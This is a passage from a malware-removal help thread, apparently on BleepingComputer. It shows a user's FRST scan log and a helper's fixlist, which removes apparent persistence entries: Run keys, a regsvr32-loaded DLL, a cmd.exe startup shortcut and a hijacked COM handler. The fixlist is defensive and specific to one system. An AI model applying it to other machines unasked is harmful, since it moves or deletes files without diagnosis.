2016-08-25 23:41 - 2016-08-06 08:44 - 00145248 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ksecpkg.sys
2016-08-25 23:41 - 2016-08-06 08:38 - 02251432 ____C (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-08-25 23:41 - 2016-08-06 08:38 - 00509784 ____C (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2016-08-25 23:41 - 2016-08-06 08:37 - 00520192 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-08-25 23:41 - 2016-08-06 08:36 - 00399200 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-08-25 23:41 - 2016-08-06 08:36 - 00357216 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2016-08-25 23:41 - 2016-08-06 08:36 - 00186712 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2016-08-25 23:41 - 2016-08-06 08:34 - 00361096 ____C (Microsoft Corporation) C:\WINDOWS\system32\tsmf.dll
2016-08-25 23:41 - 2016-08-06 08:33 - 01343928 ____C (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-08-25 23:41 - 2016-08-06 08:33 - 00955008 ____C (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-08-25 23:41 - 2016-08-06 08:33 - 00529928 ____C (Microsoft Corporation) C:\WINDOWS\system32\mf.dll
2016-08-25 23:41 - 2016-08-06 08:33 - 00036168 ____C (Microsoft Corporation) C:\WINDOWS\system32\mfpmp.exe
2016-08-25 23:41 - 2016-08-06 08:32 - 00321280 ____C (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2016-08-25 23:41 - 2016-08-06 08:28 - 01276608 ____C (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-08-25 23:41 - 2016-08-06 08:28 - 00484544 ____C (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-08-25 23:41 - 2016-08-06 08:28 - 00046784 ____C (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-08-25 23:41 - 2016-08-06 08:18 - 01631232 ____C (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2016-08-25 23:41 - 2016-08-06 08:17 - 00047104 ____C (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2016-08-25 23:41 - 2016-08-06 08:15 - 00226304 ____C (Microsoft Corporation) C:\WINDOWS\system32\container.dll
2016-08-25 23:41 - 2016-08-06 08:15 - 00029696 ____C (Microsoft Corporation) C:\WINDOWS\system32\iernonce.dll
2016-08-25 23:41 - 2016-08-06 08:15 - 00025600 ____C (Microsoft Corporation) C:\WINDOWS\system32\netiougc.exe
2016-08-25 23:41 - 2016-08-06 08:14 - 00061440 ____C (Microsoft Corporation) C:\WINDOWS\system32\iesetup.dll
2016-08-25 23:41 - 2016-08-06 08:11 - 00211456 ____C (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-08-25 23:41 - 2016-08-06 08:10 - 00426496 ____C (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2016-08-25 23:41 - 2016-08-06 08:10 - 00192512 ____C (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2016-08-25 23:41 - 2016-08-06 08:09 - 00188416 ____C (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-08-25 23:41 - 2016-08-06 08:09 - 00181760 ____C (Microsoft Corporation) C:\WINDOWS\system32\tcpipcfg.dll
2016-08-25 23:41 - 2016-08-06 08:08 - 00204800 ____C (Microsoft Corporation) C:\WINDOWS\system32\ConsoleLogon.dll
2016-08-25 23:41 - 2016-08-06 08:07 - 00340480 ____C (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-08-25 23:41 - 2016-08-06 08:07 - 00246784 ____C (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2016-08-25 23:41 - 2016-08-06 08:01 - 12174336 ____C (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-08-25 23:41 - 2016-08-06 08:00 - 00734208 ____C (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-08-25 23:41 - 2016-08-06 07:58 - 00210432 ____C (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
2016-08-25 23:41 - 2016-08-06 07:58 - 00086016 ____C (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-08-25 23:41 - 2016-08-06 07:56 - 00691712 ____C (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-08-25 23:41 - 2016-08-06 07:55 - 01595904 ____C (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-08-25 23:41 - 2016-08-06 07:55 - 01121792 ____C (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-08-25 23:41 - 2016-08-06 07:55 - 00296960 ____C (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-08-25 23:41 - 2016-08-06 07:54 - 02026496 ____C (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-08-25 23:41 - 2016-08-06 07:54 - 01231872 ____C (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-08-25 23:41 - 2016-08-06 07:54 - 00920064 ____C (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-08-25 23:41 - 2016-08-06 07:53 - 00860672 ____C (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-08-25 23:41 - 2016-08-06 07:53 - 00448512 ____C (Microsoft Corporation) C:\WINDOWS\system32\w32time.dll
2016-08-25 23:41 - 2016-08-06 07:51 - 01435136 ____C (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2016-08-25 23:41 - 2016-08-06 07:51 - 00102400 ____C (Microsoft Corporation) C:\WINDOWS\system32\offlinelsa.dll
2016-08-25 23:41 - 2016-08-05 12:53 - 00105984 ____C (Microsoft Corporation) C:\WINDOWS\system32\sppc.dll
2016-08-25 23:41 - 2016-08-05 12:48 - 00118272 ____C (Microsoft Corporation) C:\WINDOWS\system32\slc.dll
2016-08-25 23:40 - 2016-08-06 08:56 - 00036704 ____C (Microsoft Corporation) C:\WINDOWS\system32\SysResetErr.exe
2016-08-25 23:40 - 2016-08-06 08:54 - 01583112 ____C (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-08-25 23:40 - 2016-08-06 08:52 - 00105824 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\partmgr.sys
2016-08-25 23:40 - 2016-08-06 08:45 - 00292184 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
2016-08-25 23:40 - 2016-08-06 08:38 - 00313560 ____C (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-08-25 23:40 - 2016-08-06 08:33 - 01557296 ____C (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2016-08-25 23:40 - 2016-08-06 08:29 - 00127168 ____C (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-08-25 23:40 - 2016-08-06 08:28 - 01968480 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2016-08-25 23:40 - 2016-08-06 08:19 - 00010240 ____C (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.exe
2016-08-25 23:40 - 2016-08-06 08:18 - 00023552 ____C (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-08-25 23:40 - 2016-08-06 08:18 - 00015360 ____C (Microsoft Corporation) C:\WINDOWS\system32\wlanhlp.dll
2016-08-25 23:40 - 2016-08-06 08:18 - 00009216 ____C (Microsoft Corporation) C:\WINDOWS\system32\spwmp.dll
2016-08-25 23:40 - 2016-08-06 08:18 - 00005120 ____C (Microsoft Corporation) C:\WINDOWS\system32\msdxm.ocx
2016-08-25 23:40 - 2016-08-06 08:18 - 00005120 ____C (Microsoft Corporation) C:\WINDOWS\system32\dxmasf.dll
2016-08-25 23:40 - 2016-08-06 08:17 - 00070656 ____C (Microsoft Corporation) C:\WINDOWS\system32\dasHost.exe
2016-08-25 23:40 - 2016-08-06 08:17 - 00040960 ____C (Microsoft Corporation) C:\WINDOWS\system32\StorageUsage.dll
2016-08-25 23:40 - 2016-08-06 08:17 - 00031744 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidparse.sys
2016-08-25 23:40 - 2016-08-06 08:17 - 00026624 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidusb.sys
2016-08-25 23:40 - 2016-08-06 08:16 - 09260032 ____C (Microsoft Corporation) C:\WINDOWS\system32\wmploc.DLL
2016-08-25 23:40 - 2016-08-06 08:16 - 00166400 ____C (Microsoft Corporation) C:\WINDOWS\system32\dafpos.dll
2016-08-25 23:40 - 2016-08-06 08:15 - 00215040 ____C (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_WorkAccess.dll
2016-08-25 23:40 - 2016-08-06 08:15 - 00038912 ____C (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-08-25 23:40 - 2016-08-06 08:15 - 00020480 ____C (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-08-25 23:40 - 2016-08-06 08:14 - 00035328 ____C (Microsoft Corporation) C:\WINDOWS\system32\deviceassociation.dll
2016-08-25 23:40 - 2016-08-06 08:13 - 00395264 ____C (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-08-25 23:40 - 2016-08-06 08:13 - 00338432 ____C (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-08-25 23:40 - 2016-08-06 08:13 - 00270848 ____C (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-08-25 23:40 - 2016-08-06 08:13 - 00116224 ____C (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hidclass.sys
2016-08-25 23:40 - 2016-08-06 08:11 - 00231424 ____C (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2016-08-25 23:40 - 2016-08-06 08:08 - 00796672 ____C (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll
2016-08-25 23:40 - 2016-08-06 08:07 - 00366592 ____C (Microsoft Corporation) C:\WINDOWS\system32\das.dll
2016-08-25 23:40 - 2016-08-06 08:02 - 00945664 ____C (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-08-25 23:40 - 2016-08-06 08:02 - 00309760 ____C (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-08-25 23:40 - 2016-08-06 08:00 - 12345344 ____C (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-08-25 23:40 - 2016-08-06 08:00 - 01255936 ____C (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2016-08-25 23:40 - 2016-08-06 08:00 - 00085504 ____C (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-08-25 23:40 - 2016-08-06 07:55 - 01997824 ____C (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-08-25 23:40 - 2016-08-05 13:40 - 00939872 ____C (Microsoft Corporation) C:\WINDOWS\system32\pidgenx.dll
2016-08-25 23:40 - 2016-08-05 13:36 - 04970216 ____C (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2016-08-25 23:40 - 2016-08-05 13:24 - 00564488 ____C (Microsoft Corporation) C:\WINDOWS\system32\GenValObj.exe
2016-08-25 23:40 - 2016-08-05 12:59 - 00019968 ____C (Microsoft Corporation) C:\WINDOWS\system32\slcext.dll
2016-08-25 23:40 - 2016-08-05 12:50 - 00466432 ____C (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll
2016-08-25 23:19 - 2016-09-11 12:58 - 00000000 ___DC C:\Users\Sina\Downloads\Telegram Desktop
2016-08-25 15:45 - 2016-08-25 15:45 - 00000000 ____D C:\Users\Sina\AppData\Roaming\Skype
2016-08-25 08:46 - 2016-09-11 14:12 - 00000000 ____D C:\ProgramData\ASUS Smart Gesture
2016-08-24 22:30 - 2016-09-11 14:12 - 00000000 __SHD C:\Users\Sina\IntelGraphicsProfiles
2016-08-24 21:01 - 2016-08-24 21:01 - 00001145 _____ C:\Users\Sina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Telegram.lnk
2016-08-24 21:00 - 2016-09-11 13:55 - 00000000 ____D C:\Users\Sina\AppData\Roaming\Telegram Desktop
2016-08-24 13:47 - 2016-09-01 02:54 - 00000000 ___DC C:\WINDOWS\Panther
2016-08-24 13:43 - 2016-08-24 10:28 - 00000000 ___DC C:\Windows.old
2016-08-24 13:42 - 2016-08-24 13:42 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2016-08-24 13:41 - 2016-08-24 13:41 - 00000000 ____D C:\Program Files\Reference Assemblies
2016-08-24 13:41 - 2016-08-24 13:41 - 00000000 ____D C:\Program Files\MSBuild
2016-08-24 13:41 - 2016-05-25 23:33 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2016-08-24 13:41 - 2016-05-25 23:33 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2016-08-24 13:41 - 2016-05-25 23:33 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2016-08-24 11:00 - 2016-08-24 11:00 - 00000000 ____D C:\ProgramData\SetupTPDriver
2016-08-24 10:18 - 2016-08-24 10:18 - 00001047 _____ C:\Users\Sina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Optional Features.lnk
2016-08-24 10:10 - 2016-08-24 10:35 - 00000000 ____D C:\Users\Sina\AppData\Local\MicrosoftEdge
2016-08-24 10:05 - 2016-08-24 10:05 - 00000000 ____D C:\Users\Sina\AppData\Local\NetworkTiles
2016-08-24 10:04 - 2016-08-25 15:47 - 00002376 _____ C:\Users\Sina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-08-24 10:04 - 2016-08-24 10:04 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2016-08-24 10:02 - 2016-08-25 08:46 - 00000000 ____D C:\Users\Sina\AppData\Local\ConnectedDevicesPlatform
2016-08-24 10:02 - 2016-08-24 10:02 - 00000020 ___SH C:\Users\Sina\ntuser.ini
2016-08-24 10:02 - 2016-08-24 10:02 - 00000000 ____D C:\Users\Sina\AppData\Local\TileDataLayer
2016-08-24 10:02 - 2016-08-24 10:02 - 00000000 ____D C:\Users\Sina\AppData\Local\Publishers
2016-08-24 10:02 - 2016-08-24 10:02 - 00000000 ____D C:\Users\Sina\AppData\Local\Comms
2016-08-24 01:31 - 2016-08-24 01:31 - 00000000 _SHDL C:\Users\Default\My Documents
2016-08-24 01:31 - 2016-08-24 01:31 - 00000000 _SHDL C:\Users\Default\Documents\My Videos
2016-08-24 01:31 - 2016-08-24 01:31 - 00000000 _SHDL C:\Users\Default\Documents\My Pictures
2016-08-24 01:31 - 2016-08-24 01:31 - 00000000 _SHDL C:\Users\Default\Documents\My Music
2016-08-24 01:31 - 2016-08-24 01:31 - 00000000 _SHDL C:\Users\Default User\Documents\My Videos
2016-08-24 01:31 - 2016-08-24 01:31 - 00000000 _SHDL C:\Users\Default User\Documents\My Pictures
2016-08-24 01:31 - 2016-08-24 01:31 - 00000000 _SHDL C:\Users\Default User\Documents\My Music
2016-08-24 01:31 - 2016-08-24 01:31 - 00000000 ____D C:\ProgramData\USOShared
2016-08-24 01:30 - 2016-08-24 01:30 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2016-08-24 01:30 - 2016-08-24 01:30 - 00007623 _____ C:\WINDOWS\diagerr.xml
2016-08-24 01:28 - 2016-09-11 14:19 - 01429990 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-08-24 01:27 - 2016-09-11 14:12 - 00000006 ___HC C:\WINDOWS\Tasks\SA.DAT
2016-08-24 01:27 - 2016-08-24 01:27 - 00021316 _____ C:\WINDOWS\system32\emptyregdb.dat
2016-08-24 01:24 - 2016-08-24 01:24 - 00001544 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2016-08-24 01:22 - 2016-09-11 13:49 - 00000000 ____D C:\Users\Sina
2016-08-24 01:22 - 2016-08-24 01:22 - 00000000 _SHDL C:\Users\Sina\My Documents
2016-08-24 01:22 - 2016-08-24 01:22 - 00000000 _SHDL C:\Users\Sina\Documents\My Videos
2016-08-24 01:22 - 2016-08-24 01:22 - 00000000 _SHDL C:\Users\Sina\Documents\My Pictures
2016-08-24 01:22 - 2016-08-24 01:22 - 00000000 _SHDL C:\Users\Sina\Documents\My Music
2016-08-24 01:22 - 2016-08-24 01:22 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2016-08-24 01:19 - 2016-08-24 01:23 - 00000000 ____D C:\Program Files\Intel
2016-08-24 01:19 - 2016-08-24 01:19 - 00000000 ___DC C:\Intel
2016-08-24 01:19 - 2016-08-24 01:19 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdFs_01_11_00.Wdf
2016-08-24 01:19 - 2016-08-24 01:19 - 00000000 ____D C:\Program Files\Common Files\Intel
2016-08-24 01:19 - 2016-05-03 23:26 - 00077832 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL
2016-08-24 01:18 - 2016-09-11 15:18 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2016-08-24 01:18 - 2016-09-03 21:48 - 00204864 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-08-24 01:18 - 2016-09-03 11:19 - 00065536 ____N C:\WINDOWS\Minidump\090316-12578-01.dmp
2016-08-24 01:18 - 2016-08-24 01:18 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2016-08-19 04:05 - 2016-09-11 14:37 - 00000000 _RDOC C:\Users\Sina\OneDrive
2016-08-15 01:08 - 2016-07-27 23:55 - 00406184 ____C (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2016-08-14 23:06 - 2016-08-14 23:07 - 00000000 ___DC C:\WINDOWS\system32\MRT
2016-08-14 23:06 - 2016-08-14 23:06 - 144884648 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-08-14 01:32 - 2016-09-03 21:49 - 00000000 _RHDC C:\Users\Public\AccountPictures
2016-08-14 00:03 - 2016-08-14 00:03 - 00000000 ___HC C:\WINDOWS\system32\Drivers\Msft_User_LocationProvider_01_11_00.Wdf
2016-08-13 23:53 - 2016-08-14 18:38 - 00000000 __HDC C:\$GetCurrent
2016-08-13 23:36 - 2016-08-13 23:36 - 00000000 ___DC C:\Users\Sina\AppData\Roaming\Macromedia
2016-08-13 14:09 - 2016-08-13 14:09 - 00000000 ___DC C:\Users\Sina\AppData\Roaming\WebStorage
2016-08-13 14:07 - 2016-08-18 02:25 - 00000000 __RDC C:\Users\Sina\SkyDrive
2016-08-13 14:06 - 2016-08-24 10:20 - 00000000 ___DC C:\Users\Sina\AppData\Local\PackageStaging
2016-08-13 14:05 - 2016-09-10 13:24 - 00000000 ___DC C:\Users\Sina\AppData\Local\Packages
2016-08-13 14:05 - 2016-09-02 00:52 - 00000000 ___DC C:\Users\Sina\AppData\Local\VirtualStore
2016-08-13 14:05 - 2016-08-13 14:05 - 00000000 ___DC C:\Users\Sina\AppData\Roaming\Adobe
==================== One Month Modified files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-09-11 14:11 - 2016-07-16 06:52 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2016-09-11 14:07 - 2016-07-16 12:58 - 00000000 ____D C:\WINDOWS\INF
2016-09-11 13:59 - 2014-05-28 03:00 - 00000000 ___DC C:\ProgramData\Package Cache
2016-09-11 12:23 - 2013-12-14 13:13 - 00000000 ___DC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS
2016-09-11 01:18 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-09-10 17:54 - 2016-07-16 12:59 - 00000000 ___HD C:\Program Files\WindowsApps
2016-09-08 04:14 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\rescache
2016-09-03 21:47 - 2016-07-16 12:59 - 00000000 ___SD C:\WINDOWS\system32\dsc
2016-09-03 21:47 - 2016-07-16 12:59 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-09-03 21:47 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-09-03 21:47 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2016-09-03 21:47 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2016-09-03 21:47 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\system32\et-EE
2016-09-03 21:47 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\system32\es-MX
2016-09-03 21:47 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\system32\en-GB
2016-09-03 21:47 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-09-03 21:47 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\Provisioning
2016-09-03 19:28 - 2016-07-16 12:49 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-09-01 14:29 - 2016-07-16 06:52 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2016-08-31 23:20 - 2016-07-16 12:56 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.UserAccountsHandlers.dll
2016-08-31 23:20 - 2016-07-16 12:56 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-08-31 23:20 - 2016-07-16 12:55 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2016-08-31 23:20 - 2016-07-16 12:55 - 00198496 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2016-08-31 23:20 - 2016-07-16 12:55 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll
2016-08-31 23:20 - 2016-07-16 12:55 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
2016-08-31 23:20 - 2016-07-16 12:55 - 00094536 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32u.dll
2016-08-31 23:20 - 2016-07-16 12:55 - 00047104 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Shell.Search.UriHandler.dll
2016-08-31 23:20 - 2016-07-16 12:55 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-08-26 03:18 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-08-25 08:49 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\appcompat
2016-08-24 19:26 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-08-24 13:47 - 2016-07-16 13:00 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2016-08-24 11:00 - 2014-05-28 03:09 - 00000000 ___DC C:\Program Files\DIFX
2016-08-24 11:00 - 2013-12-14 13:12 - 00000000 ___DC C:\Program Files\ASUS
2016-08-24 01:31 - 2016-07-16 12:59 - 00000000 ____D C:\ProgramData\USOPrivate
2016-08-24 01:31 - 2016-07-16 12:59 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-08-24 01:30 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2016-08-24 01:28 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\Registration
2016-08-24 01:28 - 2013-08-22 12:47 - 00000000 ___DC C:\WINDOWS\system32\Tasks_Migrated
2016-08-24 01:26 - 2016-07-16 12:59 - 00000000 __RHD C:\Users\Public\Libraries
2016-08-24 01:24 - 2013-08-22 10:51 - 00000000 ___DC C:\Users\Default.migrated
2016-08-24 01:23 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\system32\spool
2016-08-24 01:23 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-08-24 01:23 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\system32\InputMethod
2016-08-24 01:23 - 2016-07-16 12:59 - 00000000 ____D C:\WINDOWS\InputMethod
2016-08-24 01:23 - 2016-07-16 12:59 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-08-24 01:23 - 2013-08-22 12:47 - 00000000 ___DC C:\WINDOWS\system32\WindowsInternal.Inbox.Shared
2016-08-24 01:23 - 2013-08-22 12:47 - 00000000 ___DC C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared
2016-08-24 01:21 - 2016-07-16 06:52 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-08-24 01:19 - 2016-07-16 12:59 - 00000000 ___RD C:\WINDOWS\PrintDialog
2016-08-24 01:19 - 2016-07-16 12:59 - 00000000 ___RD C:\WINDOWS\MiracastView
2016-08-19 12:05 - 2013-08-22 12:47 - 00000000 ___RD C:\WINDOWS\ToastData
2016-08-19 12:04 - 2013-08-22 12:47 - 00000000 ___DC C:\WINDOWS\MediaViewer
2016-08-13 14:05 - 2013-12-14 11:56 - 00000000 ___DC C:\WINDOWS\Log
==================== Files in the root of some directories =======
2016-06-17 11:23 - 2016-06-17 11:23 - 0000553 _____ () C:\Users\Sina\AppData\Roaming\Bahia
2016-06-17 11:23 - 2016-06-17 11:23 - 0000524 _____ () C:\Users\Sina\AppData\Roaming\CMYK very wm.ADO
2016-06-17 11:23 - 2016-06-17 11:23 - 0000932 _____ () C:\Users\Sina\AppData\Roaming\fix.jpg
2016-09-02 17:46 - 2016-09-02 17:46 - 0077824 _____ (Embarcadero Technologies, Inc.) C:\Users\Sina\AppData\Roaming\HelpButton.dll
2010-11-03 11:30 - 2010-11-03 11:30 - 0137694 _____ () C:\Users\Sina\AppData\Roaming\Magistracy.Xss
2013-12-14 13:12 - 2012-07-30 10:33 - 0000217 ____C () C:\ProgramData\SetStretch.cmd
2013-12-14 13:12 - 2009-07-22 14:34 - 0024576 ____C () C:\ProgramData\SetStretch.exe
2013-12-14 13:12 - 2012-09-07 16:07 - 0000103 ____C () C:\ProgramData\SetStretch.VBS
Some files in TEMP:
====================
C:\Users\Sina\AppData\Local\Temp\InsA5DD.tmp.exe
C:\Users\Sina\AppData\Local\Temp\MegaBackup.exe
C:\Users\Sina\AppData\Local\Temp\webcompanioninstaller.exe

==================== Bamital & volsnap =================
(There is no automatic fix for files that do not pass verification.)
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-08-24 01:18
==================== End of FRST.txt ============================

 

Attached Files


Edited by SinatheSaint, 11 September 2016 - 08:23 AM.


BC AdBot (Login to Remove)

 


#2 nasdaq

nasdaq

  • Malware Response Team
  • 39,191 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:04:18 AM

Posted 12 September 2016 - 08:33 AM

Hello, Welcome to BleepingComputer.
I'm nasdaq and will be helping you.

If you can please print this topic it will make it easier for you to follow the instructions and complete all of the necessary steps in the order listed.
===

Press the windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and and click the OK key.

Please copy the entire contents of the code box below to a new file.
 
Start

CreateRestorePoint:
EmptyTemp:
CloseProcesses:

() C:\Users\Sina\AppData\Local\Okscics\tmp65F1.exe
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKU\S-1-5-21-2825370636-608562156-754786092-1001\...\Run: [Okscics] => C:\Users\Sina\AppData\Local\Okscics\tmp65F1.exe [239493 2016-09-10] ()
HKU\S-1-5-21-2825370636-608562156-754786092-1001\...\Run: [YkkPack] => C:\Windows\System32\regsvr32.exe C:\Users\Sina\AppData\Local\Okscics\gsnsyjnm.dll
HKU\S-1-5-21-2825370636-608562156-754786092-1001\...409d6c4515e9\InprocServer32: [Default-shell32] C:\Users\Sina\AppData\Local\Okscics\kkpxymnr.dll ATTENTION
Startup: C:\Users\Sina\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\192b.lnk [2016-09-10]
ShortcutTarget: 192b.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKU\S-1-5-21-2825370636-608562156-754786092-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D091116-A9FF51A7D86&form=CONBDF&conlogo=CT3335371&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2825370636-608562156-754786092-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D091116-A9FF51A7D86&form=CONBDF&conlogo=CT3335371&q={searchTerms}
S3 taphss6; \SystemRoot\System32\drivers\taphss6.sys [X]
